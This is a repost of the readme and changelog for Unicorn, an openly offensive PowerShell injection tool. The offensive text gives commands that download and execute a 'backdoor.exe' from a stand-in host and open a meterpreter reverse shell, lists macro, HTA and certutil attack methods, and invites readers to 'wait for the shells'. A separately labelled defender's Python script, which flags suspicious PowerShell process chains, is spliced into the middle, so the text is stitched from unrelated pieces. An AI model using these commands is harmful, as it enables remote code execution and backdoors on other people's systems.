Changelog version 2.3:
* Added support for windows/download_exec as a payload option. Run:
    python unicorn.py windows/download_exec exe=exename.exe url=http://badsite.com/backdoor.exe
  Note that the file doesn't need to be an exe; it can be whatever you want to download and execute.
Unicorn is a PowerShell injection tool that uses Matthew Graeber's attack, expanded to automatically downgrade the process if a 64-bit platform is detected. This ensures that a payload can be delivered with just one set of shellcode instructions. It will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.
Requirements:
+ Metasploit Framework
Attack Options:
+ POWERSHELL ATTACK INSTRUCTIONS
+ MACRO ATTACK INSTRUCTIONS
+ HTA ATTACK INSTRUCTIONS
+ CERTUTIL Attack Instructions
+ Custom PS1 Attack Instructions
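For defenders, the 64-bit downgrade and the macro and HTA options above suggest two parent/child patterns to look for in process-creation telemetry. The following is an added example, not part of Unicorn or the original post. The field names follow Sysmon Event ID 1 (Image, ParentImage); the rule names, the sample events and the assumption that the downgrade shows up as 64-bit PowerShell launching the SysWOW64 copy are constructed for illustration.

```python
import ntpath  # parses Windows paths correctly on any host OS

PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

# Constructed process-creation records; only the two fields the rules need.
SAMPLE_EVENTS = [
    {"Image": PS64, "ParentImage": r"C:\Windows\explorer.exe"},   # admin shell
    {"Image": PS32, "ParentImage": PS64},                         # 64 -> 32 relaunch
    {"Image": PS64, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": PS32, "ParentImage": r"C:\Windows\explorer.exe"},   # user opened x86 shell
    {"Image": PS32, "ParentImage": r"C:\Windows\System32\mshta.exe"},
    {"Image": PS64},                                              # parent field missing
]

# Hypothetical allow/deny sets; tune to the applications in your environment.
DOCUMENT_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe"}


def _name(path):
    """Lower-cased executable name, tolerant of missing fields."""
    return ntpath.basename(path or "").lower()


def _is_wow64(path):
    return "\\syswow64\\" in (path or "").lower()


def classify(event):
    """Return the names of the rules a process-creation event matches."""
    image, parent = event.get("Image"), event.get("ParentImage")
    if _name(image) not in POWERSHELL:
        return []
    hits = []
    # 64-bit PowerShell starting the 32-bit copy is rare in normal administration.
    if _is_wow64(image) and _name(parent) in POWERSHELL and not _is_wow64(parent):
        hits.append("wow64-downgrade")
    # Office applications and mshta.exe should not normally spawn PowerShell.
    if _name(parent) in DOCUMENT_HOSTS:
        hits.append("script-host-parent")
    return hits


def scan(events):
    """Return (index, matched rules) for every event that matched a rule."""
    results = [(i, classify(e)) for i, e in enumerate(events)]
    return [(i, hits) for i, hits in results if hits]


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, ", ".join(hits))
```

A 32-bit PowerShell started directly by explorer.exe is deliberately not flagged, since that is what a user opening the x86 shell looks like.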
Usage:
    git clone https://github.com/trustedsec/unicorn && cd unicorn
    ./unicorn --help
Update:
    cd unicorn
    git pull origin master
Example use:
    python unicorn.py payload reverse_ipaddr port
Example:
    python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443
Source: TrustedSec | https://www.trustedsec.com/